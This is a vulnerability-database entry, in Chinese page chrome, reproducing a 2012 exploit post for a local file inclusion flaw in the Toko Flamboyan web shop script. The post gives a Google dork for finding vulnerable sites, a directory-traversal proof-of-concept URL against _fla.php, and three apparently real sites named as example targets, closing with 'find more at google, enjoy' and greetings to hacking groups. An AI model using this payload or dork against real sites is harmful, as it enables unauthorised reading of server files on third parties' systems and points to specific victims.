Toko Flamboyan Local File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047122 漏洞类型
发布时间 2012-06-27 更新时间 2012-06-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060313
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Toko Flamboyan - Local File Inclusion
# Author: Dark-Puzzle
# Category : Webapps
# Vendor Homepage: http://www.flamboyan.co.id/
# Google Dork: inurl:"_fla.php?_fla="
# Date: 23 June 2012
# Vendor : Toko Flamboyan
# Version: All Versions 
# Tested on: Windows Xp Sp2 , Backtrack 5 .
-------------------------------------------------------------
Local File Inclusion :

Exploit Discovered in _fla.php

error :

www.example.com/_fla.php?_fla=..


PoC : 

www.example.com/_fla.php?_fla=../../../../../..[LFI]

Example sites :

http://www.flamboyan-hypermarket.com/_fla.php?_fla=kategori
http://rokok.web.id/_fla.php?_fla=produk
http://bogor.agen.biz/_fla.php?_fla=z_daftar_harga

find more at google , enjoy .



Greetz To : Moroccan Cyber Army , Team-Hunter , Dr.Napst3r ...